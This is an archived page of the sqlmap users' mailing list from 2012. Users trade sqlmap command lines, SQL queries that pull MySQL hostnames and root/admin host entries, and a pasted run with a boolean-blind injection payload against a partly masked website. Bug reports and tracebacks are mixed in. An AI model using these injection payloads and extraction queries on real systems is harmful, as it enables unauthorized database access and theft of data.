sqlmap-users Mailing List for sqlmap (Page 47)
Brought to you by:
inquisb
Menu
▾
▴
sqlmap-users — sqlmap users mailing list
You can subscribe to this list here.
| 2008 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
(4) |
Oct
(11) |
Nov
(24) |
Dec
(13) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2009 |
Jan
(23) |
Feb
(17) |
Mar
(13) |
Apr
(48) |
May
(22) |
Jun
(18) |
Jul
(22) |
Aug
(13) |
Sep
(23) |
Oct
(6) |
Nov
(11) |
Dec
(25) |
| 2010 |
Jan
(21) |
Feb
(33) |
Mar
(61) |
Apr
(47) |
May
(48) |
Jun
(30) |
Jul
(24) |
Aug
(37) |
Sep
(52) |
Oct
(59) |
Nov
(32) |
Dec
(57) |
| 2011 |
Jan
(166) |
Feb
(93) |
Mar
(65) |
Apr
(117) |
May
(87) |
Jun
(124) |
Jul
(102) |
Aug
(78) |
Sep
(65) |
Oct
(22) |
Nov
(71) |
Dec
(79) |
| 2012 |
Jan
(93) |
Feb
(55) |
Mar
(45) |
Apr
(49) |
May
(56) |
Jun
(93) |
Jul
(95) |
Aug
(42) |
Sep
(26) |
Oct
(36) |
Nov
(32) |
Dec
(46) |
| 2013 |
Jan
(36) |
Feb
(78) |
Mar
(38) |
Apr
(57) |
May
(35) |
Jun
(39) |
Jul
(23) |
Aug
(33) |
Sep
(28) |
Oct
(38) |
Nov
(22) |
Dec
(16) |
| 2014 |
Jan
(33) |
Feb
(23) |
Mar
(41) |
Apr
(29) |
May
(12) |
Jun
(20) |
Jul
(21) |
Aug
(23) |
Sep
(18) |
Oct
(34) |
Nov
(12) |
Dec
(39) |
| 2015 |
Jan
(2) |
Feb
(51) |
Mar
(10) |
Apr
(28) |
May
(9) |
Jun
(22) |
Jul
(32) |
Aug
(35) |
Sep
(29) |
Oct
(50) |
Nov
(8) |
Dec
(2) |
| 2016 |
Jan
(8) |
Feb
(2) |
Mar
(3) |
Apr
(14) |
May
|
Jun
|
Jul
|
Aug
(12) |
Sep
|
Oct
|
Nov
(1) |
Dec
(19) |
| 2017 |
Jan
|
Feb
(18) |
Mar
|
Apr
(1) |
May
|
Jun
|
Jul
|
Aug
(4) |
Sep
|
Oct
|
Nov
(2) |
Dec
|
| 2018 |
Jan
|
Feb
|
Mar
(1) |
Apr
(1) |
May
(3) |
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
| 2019 |
Jan
|
Feb
|
Mar
|
Apr
(3) |
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
|
From: Miroslav S. <mir...@gm...> - 2012-11-28 09:25:33
|
On Wed, Nov 28, 2012 at 10:12 AM, Stephen Shkardoon <ss...@ss...>wrote: > Don't all these current methods rely on either the hostname of the MySQL > server to be something that actually resolves, or a authentication rule > using a public IP? If a server is NAT'd, won't both of these fail? > Could a more reliable way of getting the IP/hostname be make a DNS request > or simliar, that way you'll get the public IP as long as it can make an > outgoing connection (which seems more likely on average than having a rule > for authenticating users with it, or having the hostname be resolvable). > Maybe sqlmap could try a combination of these for an improved hostname > lookup? Or is this more work for a edge case (or possibly what I said above > is wrong and one of the other methods will consistently work). > More work than benefit(s). We won't extend this any further than --hostname switch itself. I just wrote that last method as it could give you a list of IP addresses from where root/admin can connect. Thing is that database administrators tend to put all sorts of IP addresses and a wild guess is that you'll get some interesting ones there (hostname itself, ip addresses coming from a local network,...). > > > On Wed, Nov 28, 2012 at 10:04 PM, Miroslav Stampar < > mir...@gm...> wrote: > >> Hi. >> >> If you want to get IP addresses of interest you could try something like >> this: >> --sql-query="SELECT host, user FROM mysql.user WHERE user LIKE '%root%' >> OR user LIKE '%admin%'" >> >> back-end DBMS: MySQL >= 5.0.0 >> [10:00:24] [INFO] fetching SQL SELECT statement query output: 'SELECT >> host, user FROM mysql.user WHERE user LIKE '%root%' OR user LIKE '%admin%'' >> SELECT host, user FROM mysql.user WHERE user LIKE '%root%' OR user LIKE >> '%admin%' [6]: >> [*] 127.0.0.1, root >> [*] 172.16.162.1, root >> [*] 192.168.21.1, root >> [*] debian-5.0-i386, root >> [*] localhost, root >> >> Kind regards, >> Miroslav Stampar >> >> >> On Wed, Nov 28, 2012 at 9:55 AM, Zaki Akhmad <zak...@gm...>wrote: >> >>> On Wed, Nov 28, 2012 at 3:53 PM, Leon Jacobs <leo...@gm...> >>> wrote: >>> > On Wed, Nov 28, 2012 at 10:48 AM, Miroslav Stampar >>> > <mir...@gm...> wrote: >>> >> >>> >> That proposed solution is equivalent to the SELECT @@hostname (except >>> that >>> >> last one doesn't need that non-query SHOW statement). Only thing is >>> that >>> >> you'll get a same result as in --hostname which is not an IP address >>> that >>> >> your require. Have to seek what can be used here. >>> > >>> > >>> > Yeah this is perfect. And then hopefully getting the IP is as simple as >>> > looking up the hostname, assuming it resolves but that is not >>> guaranteed. =p >>> >>> the --sql-query="select @@hostname" works :-) >>> >>> -- >>> Zaki Akhmad >>> >> >> >> >> -- >> Miroslav Stampar >> http://about.me/stamparm >> >> >> ------------------------------------------------------------------------------ >> Keep yourself connected to Go Parallel: >> INSIGHTS What's next for parallel hardware, programming and related areas? >> Interviews and blogs by thought leaders keep you ahead of the curve. >> http://goparallel.sourceforge.net >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > -- Miroslav Stampar http://about.me/stamparm |
|
From: Zaki A. <zak...@gm...> - 2012-11-28 09:15:06
|
On Wed, Nov 28, 2012 at 4:04 PM, Miroslav Stampar <mir...@gm...> wrote: > Hi. > > If you want to get IP addresses of interest you could try something like > this: > --sql-query="SELECT host, user FROM mysql.user WHERE user LIKE '%root%' OR > user LIKE '%admin%'" > > back-end DBMS: MySQL >= 5.0.0 > [10:00:24] [INFO] fetching SQL SELECT statement query output: 'SELECT host, > user FROM mysql.user WHERE user LIKE '%root%' OR user LIKE '%admin%'' > SELECT host, user FROM mysql.user WHERE user LIKE '%root%' OR user LIKE > '%admin%' [6]: > [*] 127.0.0.1, root > [*] 172.16.162.1, root > [*] 192.168.21.1, root > [*] debian-5.0-i386, root > [*] localhost, root Thanks a lot, Miroslav. -- Zaki Akhmad |
|
From: Stephen S. <ss...@ss...> - 2012-11-28 09:12:43
|
Don't all these current methods rely on either the hostname of the MySQL server to be something that actually resolves, or a authentication rule using a public IP? If a server is NAT'd, won't both of these fail? Could a more reliable way of getting the IP/hostname be make a DNS request or simliar, that way you'll get the public IP as long as it can make an outgoing connection (which seems more likely on average than having a rule for authenticating users with it, or having the hostname be resolvable). Maybe sqlmap could try a combination of these for an improved hostname lookup? Or is this more work for a edge case (or possibly what I said above is wrong and one of the other methods will consistently work). On Wed, Nov 28, 2012 at 10:04 PM, Miroslav Stampar < mir...@gm...> wrote: > Hi. > > If you want to get IP addresses of interest you could try something like > this: > --sql-query="SELECT host, user FROM mysql.user WHERE user LIKE '%root%' OR > user LIKE '%admin%'" > > back-end DBMS: MySQL >= 5.0.0 > [10:00:24] [INFO] fetching SQL SELECT statement query output: 'SELECT > host, user FROM mysql.user WHERE user LIKE '%root%' OR user LIKE '%admin%'' > SELECT host, user FROM mysql.user WHERE user LIKE '%root%' OR user LIKE > '%admin%' [6]: > [*] 127.0.0.1, root > [*] 172.16.162.1, root > [*] 192.168.21.1, root > [*] debian-5.0-i386, root > [*] localhost, root > > Kind regards, > Miroslav Stampar > > > On Wed, Nov 28, 2012 at 9:55 AM, Zaki Akhmad <zak...@gm...> wrote: > >> On Wed, Nov 28, 2012 at 3:53 PM, Leon Jacobs <leo...@gm...> wrote: >> > On Wed, Nov 28, 2012 at 10:48 AM, Miroslav Stampar >> > <mir...@gm...> wrote: >> >> >> >> That proposed solution is equivalent to the SELECT @@hostname (except >> that >> >> last one doesn't need that non-query SHOW statement). Only thing is >> that >> >> you'll get a same result as in --hostname which is not an IP address >> that >> >> your require. Have to seek what can be used here. >> > >> > >> > Yeah this is perfect. And then hopefully getting the IP is as simple as >> > looking up the hostname, assuming it resolves but that is not >> guaranteed. =p >> >> the --sql-query="select @@hostname" works :-) >> >> -- >> Zaki Akhmad >> > > > > -- > Miroslav Stampar > http://about.me/stamparm > > > ------------------------------------------------------------------------------ > Keep yourself connected to Go Parallel: > INSIGHTS What's next for parallel hardware, programming and related areas? > Interviews and blogs by thought leaders keep you ahead of the curve. > http://goparallel.sourceforge.net > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > |
|
From: Miroslav S. <mir...@gm...> - 2012-11-28 09:04:38
|
Hi. If you want to get IP addresses of interest you could try something like this: --sql-query="SELECT host, user FROM mysql.user WHERE user LIKE '%root%' OR user LIKE '%admin%'" back-end DBMS: MySQL >= 5.0.0 [10:00:24] [INFO] fetching SQL SELECT statement query output: 'SELECT host, user FROM mysql.user WHERE user LIKE '%root%' OR user LIKE '%admin%'' SELECT host, user FROM mysql.user WHERE user LIKE '%root%' OR user LIKE '%admin%' [6]: [*] 127.0.0.1, root [*] 172.16.162.1, root [*] 192.168.21.1, root [*] debian-5.0-i386, root [*] localhost, root Kind regards, Miroslav Stampar On Wed, Nov 28, 2012 at 9:55 AM, Zaki Akhmad <zak...@gm...> wrote: > On Wed, Nov 28, 2012 at 3:53 PM, Leon Jacobs <leo...@gm...> wrote: > > On Wed, Nov 28, 2012 at 10:48 AM, Miroslav Stampar > > <mir...@gm...> wrote: > >> > >> That proposed solution is equivalent to the SELECT @@hostname (except > that > >> last one doesn't need that non-query SHOW statement). Only thing is that > >> you'll get a same result as in --hostname which is not an IP address > that > >> your require. Have to seek what can be used here. > > > > > > Yeah this is perfect. And then hopefully getting the IP is as simple as > > looking up the hostname, assuming it resolves but that is not > guaranteed. =p > > the --sql-query="select @@hostname" works :-) > > -- > Zaki Akhmad > -- Miroslav Stampar http://about.me/stamparm |
|
From: root <ro...@cn...> - 2012-11-28 09:00:22
|
this problem was fixed.thks
thanks&Best Regards
From: Zaki Akhmad
Date: 2012-11-28 16:34
To: root
CC: Luka Pušić; sqlmap-users
Subject: Re: [sqlmap-users] GitHub for Windows
On Fri, Nov 9, 2012 at 9:00 PM, root <ro...@cn...> wrote:
>
> no,i not modified sqlmap's files
Try this command:
$ git pull origin master
--
Zaki Akhmad |
|
From: Zaki A. <zak...@gm...> - 2012-11-28 08:56:00
|
On Wed, Nov 28, 2012 at 3:53 PM, Leon Jacobs <leo...@gm...> wrote: > On Wed, Nov 28, 2012 at 10:48 AM, Miroslav Stampar > <mir...@gm...> wrote: >> >> That proposed solution is equivalent to the SELECT @@hostname (except that >> last one doesn't need that non-query SHOW statement). Only thing is that >> you'll get a same result as in --hostname which is not an IP address that >> your require. Have to seek what can be used here. > > > Yeah this is perfect. And then hopefully getting the IP is as simple as > looking up the hostname, assuming it resolves but that is not guaranteed. =p the --sql-query="select @@hostname" works :-) -- Zaki Akhmad |
|
From: Leon J. <leo...@gm...> - 2012-11-28 08:53:32
|
On Wed, Nov 28, 2012 at 10:48 AM, Miroslav Stampar < mir...@gm...> wrote: > That proposed solution is equivalent to the SELECT @@hostname (except that > last one doesn't need that non-query SHOW statement). Only thing is that > you'll get a same result as in --hostname which is not an IP address that > your require. Have to seek what can be used here. Yeah this is perfect. And then hopefully getting the IP is as simple as looking up the hostname, assuming it resolves but that is not guaranteed. =p -- Regards Leon Jacobs Sent using electronic mail ツ |
|
From: Miroslav S. <mir...@gm...> - 2012-11-28 08:48:44
|
That proposed solution is equivalent to the SELECT @@hostname (except that last one doesn't need that non-query SHOW statement). Only thing is that you'll get a same result as in --hostname which is not an IP address that your require. Have to seek what can be used here. Kind regards On Wed, Nov 28, 2012 at 9:39 AM, Leon Jacobs <leo...@gm...> wrote: > On Wed, Nov 28, 2012 at 10:31 AM, Zaki Akhmad <zak...@gm...>wrote: > >> Hello, >> >> I found SQL injection vulnerability. I want to know the database >> server IP address. From the fingerprint result, the database server is >> MySQL. How should I write the --sql-query so that I could retrieve the >> MySQL database server IP address? It's n-tier web appliction. >> >> $ python sqlmap.py -u something --sql-query="" >> >> Just an idea: maybe it's possible to add a built-in sql query function >> to retrieve database server IP address whatever the databases is used >> (or I am the one who didn't know it?) >> >> Thanks, >> > > If its MySQL and according to [1], try: > > $ python sqlmap.py -u something --sql-query="show variables where > Variable_name = 'hostname'" > > I am not 100% sure about the required permissions/escaping that might be > needed to achieve this via your injection point though... > > -- > Regards > Leon Jacobs > > Sent using electronic mail ツ > > [1] http://dev.mysql.com/doc/refman/5.1/en/show-variables.html > > > ------------------------------------------------------------------------------ > Keep yourself connected to Go Parallel: > INSIGHTS What's next for parallel hardware, programming and related areas? > Interviews and blogs by thought leaders keep you ahead of the curve. > http://goparallel.sourceforge.net > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
|
From: Zaki A. <zak...@gm...> - 2012-11-28 08:45:58
|
On Wed, Nov 28, 2012 at 3:39 PM, Leon Jacobs <leo...@gm...> wrote: > If its MySQL and according to [1], try: > > $ python sqlmap.py -u something --sql-query="show variables where > Variable_name = 'hostname'" > > I am not 100% sure about the required permissions/escaping that might be > needed to achieve this via your injection point though... Here's the result: Is it not possible from the injection point? Or are there any other sql-query? back-end DBMS: MySQL 5.0 [15:43:37] [INFO] fetching SQL SELECT statement query output: 'show variables where Variable_name = 'hostname'' [15:43:37] [WARNING] reflective value(s) found and filtering out [15:43:37] [INFO] resumed: None show variables where Variable_name = 'hostname': 'None' -- Zaki Akhmad |
|
From: Leon J. <leo...@gm...> - 2012-11-28 08:39:56
|
On Wed, Nov 28, 2012 at 10:31 AM, Zaki Akhmad <zak...@gm...> wrote: > Hello, > > I found SQL injection vulnerability. I want to know the database > server IP address. From the fingerprint result, the database server is > MySQL. How should I write the --sql-query so that I could retrieve the > MySQL database server IP address? It's n-tier web appliction. > > $ python sqlmap.py -u something --sql-query="" > > Just an idea: maybe it's possible to add a built-in sql query function > to retrieve database server IP address whatever the databases is used > (or I am the one who didn't know it?) > > Thanks, > If its MySQL and according to [1], try: $ python sqlmap.py -u something --sql-query="show variables where Variable_name = 'hostname'" I am not 100% sure about the required permissions/escaping that might be needed to achieve this via your injection point though... -- Regards Leon Jacobs Sent using electronic mail ツ [1] http://dev.mysql.com/doc/refman/5.1/en/show-variables.html |
|
From: Zaki A. <zak...@gm...> - 2012-11-28 08:34:19
|
On Fri, Nov 9, 2012 at 9:00 PM, root <ro...@cn...> wrote: > > no,i not modified sqlmap's files Try this command: $ git pull origin master -- Zaki Akhmad |
|
From: Zaki A. <zak...@gm...> - 2012-11-28 08:32:07
|
Hello, I found SQL injection vulnerability. I want to know the database server IP address. From the fingerprint result, the database server is MySQL. How should I write the --sql-query so that I could retrieve the MySQL database server IP address? It's n-tier web appliction. $ python sqlmap.py -u something --sql-query="" Just an idea: maybe it's possible to add a built-in sql query function to retrieve database server IP address whatever the databases is used (or I am the one who didn't know it?) Thanks, -- Zaki Akhmad |
|
From: Miroslav S. <mir...@gm...> - 2012-11-26 12:36:10
|
Hi again. Just update to the latest revision. This was fixed 4 months ago [1]. Kind regards, Miroslav Stampar [1] https://github.com/sqlmapproject/sqlmap/issues/142 On Mon, Nov 26, 2012 at 1:33 PM, Miroslav Stampar < mir...@gm...> wrote: > p.s. you are using quite old version of sqlmap (that third party library > currently is inside "thirdparty/clientform" directory). please update to > the latest revision from [1] to have it up to date. > > [1] https://github.com/sqlmapproject/sqlmap > > > On Mon, Nov 26, 2012 at 1:31 PM, Miroslav Stampar < > mir...@gm...> wrote: > >> Hi Tran. >> >> If you take a good look into the exception message you would see that the >> error is related to something totally different. Somebody in your case used >> invalid HTML escaping and put hexadecimal number instead of decimal to the >> &#....; format (e.g. éde; instead of 𣏞). Nevertheless, there >> should be no crashes like this. We'll fix it ASAP. >> >> Kind regards, >> Miroslav Stampar >> >> >> On Mon, Nov 26, 2012 at 12:33 PM, Tran Vien Ha <tra...@gm...>wrote: >> >>> ValueError: invalid literal for int() with base 10: '233de' >> >> >> >> >> -- >> Miroslav Stampar >> http://about.me/stamparm >> > > > > -- > Miroslav Stampar > http://about.me/stamparm > -- Miroslav Stampar http://about.me/stamparm |
|
From: Miroslav S. <mir...@gm...> - 2012-11-26 12:33:18
|
p.s. you are using quite old version of sqlmap (that third party library currently is inside "thirdparty/clientform" directory). please update to the latest revision from [1] to have it up to date. [1] https://github.com/sqlmapproject/sqlmap On Mon, Nov 26, 2012 at 1:31 PM, Miroslav Stampar < mir...@gm...> wrote: > Hi Tran. > > If you take a good look into the exception message you would see that the > error is related to something totally different. Somebody in your case used > invalid HTML escaping and put hexadecimal number instead of decimal to the > &#....; format (e.g. éde; instead of 𣏞). Nevertheless, there > should be no crashes like this. We'll fix it ASAP. > > Kind regards, > Miroslav Stampar > > > On Mon, Nov 26, 2012 at 12:33 PM, Tran Vien Ha <tra...@gm...>wrote: > >> ValueError: invalid literal for int() with base 10: '233de' > > > > > -- > Miroslav Stampar > http://about.me/stamparm > -- Miroslav Stampar http://about.me/stamparm |
|
From: Miroslav S. <mir...@gm...> - 2012-11-26 12:31:14
|
Hi Tran. If you take a good look into the exception message you would see that the error is related to something totally different. Somebody in your case used invalid HTML escaping and put hexadecimal number instead of decimal to the &#....; format (e.g. éde; instead of 𣏞). Nevertheless, there should be no crashes like this. We'll fix it ASAP. Kind regards, Miroslav Stampar On Mon, Nov 26, 2012 at 12:33 PM, Tran Vien Ha <tra...@gm...> wrote: > ValueError: invalid literal for int() with base 10: '233de' -- Miroslav Stampar http://about.me/stamparm |
|
From: Tran V. Ha <tra...@gm...> - 2012-11-26 11:34:07
|
FYI
Command line: ./sqlmap.py --proxy=*************************** -u
******************************************Copy%20of%20SubscribeOnline.aspx
--forms --dbms=MSSQL --risk=3 --level=5 -b
Technique: None
Back-end DBMS: Microsoft SQL Server (identified)
Traceback (most recent call last):
File "/pentest/database/sqlmap/_sqlmap.py", line 70, in main
init(cmdLineOptions)
File "/pentest/database/sqlmap/lib/core/option.py", line 1989, in init
__findPageForms()
File "/pentest/database/sqlmap/lib/core/option.py", line 559, in
__findPageForms
findPageForms(page, conf.url, True, True)
File "/pentest/database/sqlmap/lib/core/common.py", line 2936, in
findPageForms
forms = ParseResponse(response, backwards_compat=False)
File "/pentest/database/sqlmap/extra/clientform/clientform.py", line
1064, in ParseResponse
return _ParseFileEx(response, response.geturl(), *args, **kwds)[1:]
File "/pentest/database/sqlmap/extra/clientform/clientform.py", line
1100, in _ParseFileEx
fp.feed(data)
File "/pentest/database/sqlmap/extra/clientform/clientform.py", line 870,
in feed
sgmllib.SGMLParser.feed(self, data)
File "/usr/lib/python2.6/sgmllib.py", line 104, in feed
self.goahead(0)
File "/usr/lib/python2.6/sgmllib.py", line 186, in goahead
self.handle_charref(name)
File "/pentest/database/sqlmap/extra/clientform/clientform.py", line 755,
in handle_charref
self.handle_data(unescape_charref(name, self._encoding))
File "/pentest/database/sqlmap/extra/clientform/clientform.py", line 244,
in unescape_charref
uc = unichr(int(name, base))
ValueError: invalid literal for int() with base 10: '233de'
|
|
From: B. <sto...@qq...> - 2012-11-16 09:32:21
|
<br>Hi Stampar,<br><br> Thanks for your email . i try again . with payload hidJumpId=54' OR '54'%3D'54' AND 6149=6149 AND 'izAQ'='izAQ&JumpButton=Go&JumpPage=22 but the result the same . maybe the server filter out the data.<br><br>thanks you all the same <br><br>bob <br><div><div style="color:#909090;font-family:Arial Narrow;font-size:12px">------------------</div><div style="font-size:14px;font-family:Verdana;color:#000;"><font size="-0"><div> </div></font></div></div><div> </div><div><includetail><div><br></div><div><br></div><div style="font-size: 12px;font-family: Arial Narrow;padding:2px 0 2px 0;">------------------ 原始邮件 ------------------</div><div style="font-size: 12px;background:#efefef;padding:8px;"><div><b>发件人:</b> "Miroslav Stampar"<mir...@gm...>;</div><div><b>发送时间:</b> 2012年11月16日(星期五) 下午2:28</div><div><b>收件人:</b> "Bob"<sto...@qq...>; <wbr></div><div><b>抄送:</b> "SqlMap List"<sql...@li...>; <wbr></div><div><b>主题:</b> Re: 回复: [sqlmap-users] : sqlmap can't retrieved data</div></div><div><br></div><p dir="ltr">But why have you put that OR 54=54 inside post data. It's fascinating that no matter what protection mechanism we put inside sqlmap against users themself they'll find a way how to skip the nag message and report a bug of some kind.</p> <p dir="ltr">Could you please retry without that and use --flush-session?</p> <p dir="ltr">Kind regards</p> <div class="gmail_quote">On Nov 16, 2012 6:59 AM, "Bob" <<a href="mailto:sto...@qq...">sto...@qq...</a>> wrote:<br type="attribution"><blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex"> <div>Hi Stampar,</div><div><br></div><div> THanks for your email , i fix the last problem with your direction .</div><div><br></div><div>but another problem is coming . i have find inject point ,but can't retrieve data . details as followed . </div> <div><br></div><div><div>root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "<a href="http://www.xxxx/F/01/product/Products.asp" target="_blank">http://www.xxxx/F/01/product/Products.asp</a>" --data "hidJumpId=54%27%20OR%20%2754%27%3D%2754&JumpButton=Go&JumpPage=22" --param-del="&" --hex -a</div> <div><br></div><div> sqlmap/1.0-dev-a40d7a5 - automatic SQL injection and database takeover tool</div><div> <a href="http://sqlmap.org" target="_blank">http://sqlmap.org</a></div><div><br></div><div>[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program</div> <div><br></div><div>[*] starting at 13:53:13</div><div><br></div><div>[13:53:13] [INFO] resuming back-end DBMS 'mysql' </div><div>[13:53:13] [INFO] testing connection to the target url</div><div>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:</div> <div>---</div><div>Place: POST</div><div>Parameter: hidJumpId</div><div> Type: boolean-based blind</div><div> Title: AND boolean-based blind - WHERE or HAVING clause</div><div> Payload: hidJumpId=54' OR '54'%3D'54' AND 6149=6149 AND 'izAQ'='izAQ&JumpButton=Go&JumpPage=22</div> <div>---</div><div>[13:53:18] [INFO] the back-end DBMS is MySQL</div><div>[13:53:18] [INFO] fetching banner</div><div>[13:53:18] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval</div> <div>[13:53:18] [INFO] retrieved: </div><div>[13:53:18] [INFO] heuristics detected web page charset 'ascii'</div><div>[13:53:18] [INFO] retrieved: </div><div>web server operating system: Windows 2000</div><div>web application technology: ASP, Microsoft IIS 5.0</div> <div>back-end DBMS: MySQL 5</div><div>[13:53:18] [INFO] fetching banner</div><div>[13:53:19] [INFO] retrieved: </div><div>[13:53:19] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' and/or switch '--hex'</div> <div>banner:<span style="white-space:pre-wrap"> </span>None</div><div>[13:53:19] [INFO] fetching current user</div><div>[13:53:20] [INFO] retrieved: </div><div>current user:<span style="white-space:pre-wrap"> </span>None</div> <div>[13:53:20] [INFO] fetching current database</div><div>[13:53:21] [INFO] retrieved: </div><div>current database:<span style="white-space:pre-wrap"> </span>None</div><div>[13:53:21] [INFO] fetching server hostname</div> <div>[13:53:22] [INFO] retrieved: </div><div>hostname:<span style="white-space:pre-wrap"> </span>None</div><div>[13:53:22] [INFO] testing if current user is DBA</div><div>[13:53:22] [INFO] fetching current user</div><div> [13:53:22] [INFO] retrieved: </div><div>current user is DBA: True</div><div>[13:53:23] [INFO] fetching database users</div><div>[13:53:23] [INFO] fetching number of database users</div><div>[13:53:24] [INFO] retrieved: </div> <div>[13:53:24] [CRITICAL] unable to retrieve the number of database users</div></div><div><br></div><div>best regards </div><div><br></div><div>bob</div><div><div style="color:#909090;font-family:Arial Narrow;font-size:12px"> ------------------</div><div style="font-size:14px;font-family:Verdana"><font size="-0"> <div><br></div></font></div></div><div><u></u><div><br></div><div style="font-size:12px;font-family:Arial Narrow;padding:2px 0 2px 0">------------------ 原始邮件 ------------------</div><div style="font-size:12px;background:#efefef;padding:8px"> <div><b>发件人:</b> "Miroslav Stampar"<<a href="mailto:mir...@gm..." target="_blank">mir...@gm...</a>>;</div><div><b>发送时间:</b> 2012年11月15日(星期四) 下午2:26</div><div><b>收件人:</b> "Bob"<<a href="mailto:sto...@qq..." target="_blank">sto...@qq...</a>>; <u></u></div> <div></div><div><b>主题:</b> Re: [sqlmap-users] 回复: sqlmap y/N can 't workable</div></div><div><br></div><p dir="ltr">Hi.</p> <p dir="ltr">You are running sqlmap as a background console process. You can't expect from a such process to be able to properly accept console input you do. This is not an sqlmap issue but yours.</p> <p dir="ltr">If you want to run more instances of sqlmap at the same time either open multiple terminals or use some kind of console multiplexer (e.g. screen).</p> <p dir="ltr">Kind regards,<br> Miroslav Stampar</p> <div class="gmail_quote">On Nov 15, 2012 6:53 AM, "Bob" <<a href="mailto:sto...@qq..." target="_blank">sto...@qq...</a>> wrote:<br type="attribution"><blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex"> <div>HI Iago,</div><div><br></div><div> The sqlmap error .details as followed :</div><div><br></div><div><div>[13:32:02] [INFO] testing connection to the target url</div><div>[13:32:06] [INFO] testing if the url is stable, wait a few seconds</div> <div>[13:32:11] [INFO] url is stable</div><div>[13:32:11] [INFO] testing if POST parameter 'hidJumpId' is dynamic</div><div>[13:32:12] [INFO] confirming that POST parameter 'hidJumpId' is dynamic</div><div> [13:32:13] [INFO] POST parameter 'hidJumpId' is dynamic</div><div>[13:32:14] [WARNING] reflective value(s) found and filtering out</div><div>[13:32:14] [WARNING] heuristic test shows that POST parameter 'hidJumpId' might not be injectable</div> <div>[13:32:14] [INFO] testing for SQL injection on POST parameter 'hidJumpId'</div><div>[13:32:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'</div><div>[13:32:49] [CRITICAL] connection timed out to the target url or proxy. sqlmap is going to retry the request</div> <div>[13:33:04] [INFO] POST parameter 'hidJumpId' is 'AND boolean-based blind - WHERE or HAVING clause' injectable </div><div>[13:33:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'</div> <div>[13:33:34] [CRITICAL] connection timed out to the target url or proxy. sqlmap is going to retry the request</div><div>[13:33:36] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'</div><div> [13:33:37] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'</div><div>[13:33:37] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'</div><div>[13:33:38] [INFO] testing 'MySQL > 5.0.11 stacked queries'</div> <div>[13:33:38] [INFO] testing 'PostgreSQL > 8.1 stacked queries'</div><div>[13:33:39] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'</div><div>[13:33:39] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'</div> <div>[13:33:40] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'</div><div>[13:33:40] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'</div><div>[13:33:41] [INFO] testing 'Oracle AND time-based blind'</div> <div>[13:33:42] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'</div><div>[13:33:42] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found</div> <div>[13:33:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'</div><div>[13:33:55] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'</div> <div>[13:34:08] [INFO] checking if the injection point on POST parameter 'hidJumpId' is a false positive</div><div>[13:34:12] [INFO] heuristics detected web page charset 'ascii'</div><div>POST parameter 'hidJumpId' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N</div> <div>N: command not found</div><div><br></div><div>[4]+ Stopped ./sqlmap.py -u "<a href="http://XXXp" target="_blank">http://XXXp</a>" --data "hidJumpId=54%27%20OR%20%2754%27%3D%2754&JumpButton=Go&JumpPage=22" --param-del=</div> <div><br></div><div>[4]+ Stopped ./sqlmap.py -u "<a href="http://XXX" target="_blank">http://XXX</a>" --data "hidJumpId=54%27%20OR%20%2754%27%3D%2754&JumpButton=Go&JumpPage=22" --param-del=</div> </div><div><br></div><div><div style="color:#909090;font-family:Arial Narrow;font-size:12px"><br></div><div style="font-size:14px;font-family:Verdana"><font size="-0"> <div> </div></font></div></div><div> </div><div><u></u><div><br></div><div><br></div><div style="font-size:12px;font-family:Arial Narrow;padding:2px 0 2px 0">------------------ 原始邮件 ------------------</div><div style="font-size:12px;background:#efefef;padding:8px"> <div><b>发件人:</b> "Iago Sousa"<<a href="mailto:146...@gm..." target="_blank">146...@gm...</a>>;</div><div><b>发送时间:</b> 2012年6月24日(星期天) 中午12:33</div><div><b>收件人:</b> "Bob"<<a href="mailto:sto...@qq..." target="_blank">sto...@qq...</a>>; <u></u></div> <div><b>抄送:</b> "sqlmap-users"<<a href="mailto:sql...@li..." target="_blank">sql...@li...</a>>; <u></u></div><div><b>主题:</b> Re: [sqlmap-users] sqlmap always tell Connection timed out to thetarget url</div> </div><div><br></div><p>I think that the site is blocking your ip address.</p> <p></p><blockquote type="cite">On Jun 23, 2012 11:09 PM, "Bob" <<a href="mailto:sto...@qq..." target="_blank">sto...@qq...</a>> wrote:<br><br><div><br>Hi all,<br><br> I am use sqlmap to retrieve database <br> <br> current-user and current-db can workable <br><br>retrieve tables ,passwords etc will response time out <br><br>Could you tell me what is the problem ? how i can retrieve tables and passwords ?<br><br>Thanks <br><br>bob<br> [09:56:07] [INFO] testing connection to the target url<br>sqlmap identified the following injection points with a total of 0 HTTP(s) 